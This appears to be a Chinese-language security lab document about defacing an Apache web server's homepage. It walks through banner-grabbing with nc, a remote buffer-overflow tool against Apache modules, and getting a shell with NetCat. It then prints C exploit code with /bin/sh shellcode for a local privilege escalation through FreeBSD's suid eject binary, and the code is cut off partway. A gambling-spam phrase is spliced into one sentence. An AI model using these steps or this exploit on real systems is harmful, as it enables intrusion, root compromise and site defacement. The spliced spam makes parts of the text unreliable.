Web服务页面篡改.docVIP

Web服务首页篡改Apache HTTP Server是最流行的开放源码WEB服务器系统之一，它是由Apache Group开发、发布并支持的。Apache HTTP Server支持静态编译及动态模块加载2种方式，在其某些特定版本中的动态模块存在缓冲区溢出漏洞，攻击者会利用此漏洞达到对WEB服务器进行攻击或执行指定程序的目的。实验目的通过本实验使读者了解WEB服务器的安全漏洞以增强安全意识。 实验拓扑实验准备向远程Apache 发送精心构造的数据包以引发Apache 动态模块的溢出漏洞，进而打开一个监听端口接收连接。用nc工具连接远程端口获得shell，本地提权后，上传篡改后的主页。 1.下载实验中使用的工具：远程溢出工具 exbsd.exe、NetCat 1.11 for Windows (网络瑞士军刀)、Tftpd Server。【说明】远程溢出工具 exbsd.exe向远程Apache 发送精心构造的数据包以引发Apache 动态模块的溢出漏洞，进而打开一个监听端口接收连接。NetCat 1.11 for Windows (网络瑞士军刀) 一款小巧精悍的网络实用工具，常用来进行远程shell连接或被动接收连接以提供shell通道，或者用来作为小巧的telnet客户端使用。Tftpd Server一款支持tftp协议的服务端工具，用以上传或下载文件（tftp 协议）。 实验步骤访问目标主机的HTTP服务步骤说明：确保输入的协议及地址是正确的 1.打开浏览器，访问目标主机的 HTTP 服务，如：图1图1 探测目标主机WEB服务信息步骤说明：输入 GET /abcdefg HTTP/1.0 并连续输入两次回车（Enter），可以从返回中获取服务器版本信息。命令中的 abcdefg 是任意字符串，是不存在的页面，会引起404错误。这么做的理由是 404错误的返回页面内容比较少，便于查看。 1.开启一个命令行窗口，用 nc.exe 程序连接目标主机的 80 端口命令格式： nc.exe 目标IP 80 如：图2图2用 exbsd.exe 尝试远程溢出步骤说明：命令格式为 exbsd.exe -t 目标主机IP地址。 1.运行 exbsd.exe，如：图3图3注： 因apache服务为多进程服务，溢出程序可能需要尝试多次有哪些信誉好的足球投注网站地址空间，若失败，请多尝试几次。 溢出成功，用NetCat 连接步骤说明：命令格式为 nc.exe 目标主机IP地址 目标端口。 1.如：图4、图5，连接上以后，我们做如下操作：a). 用 id 命令看当前帐户信息，看到 uid=1001, gid=1001，是普通权限。b). 用 w 命令看当前有谁在线，看到两个远程登录连接。c). 用 pwd 命令看当前所在目录。d). 用 uname -a 看当前操作系统的信息，看到是 FreeBSD 4.8 Release 版本，未打补丁。e). 切换目录至 /tmp 下，准备编写提权程序。图4图5提升权限步骤说明：FreeBSD 老版本上的 eject 程序存在缓冲区溢出漏洞，可被本地程序利用以提升权限。eject 程序具有suid 位，在有问题的版本中未对用户输入的参数进行有效检测，导致溢出后eip指向精心构造的shellcode 入口，进而提权成功。 1.编写提权代码，如：图6图6图中所用代码如下：#include stdio.h#include stdlib.h#include string.h#include unistd.h#define BOF_LEN 1260extern char** environ;int main( void ) {char buf[BOF_LEN];char* ptr;char* arg[4];unsigned int ret = 0xbfbfeead;char shellcode[] = \xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89 \x43\x0c\x50\x8d\x53\x08\x52\x53\xb0\x3b\x50\xcd \x80\xe8\xe4\xff\xff\xff/bin/sh;char envshell[4096];memset( envshell, 0x90, 4096 );memcpy( envshell + 4096 - strlen( shellcode ), shellcode, strlen( shellcode ) );envshell[4096] = 0x0;memcpy( envshell, VULN=, 5 );putenv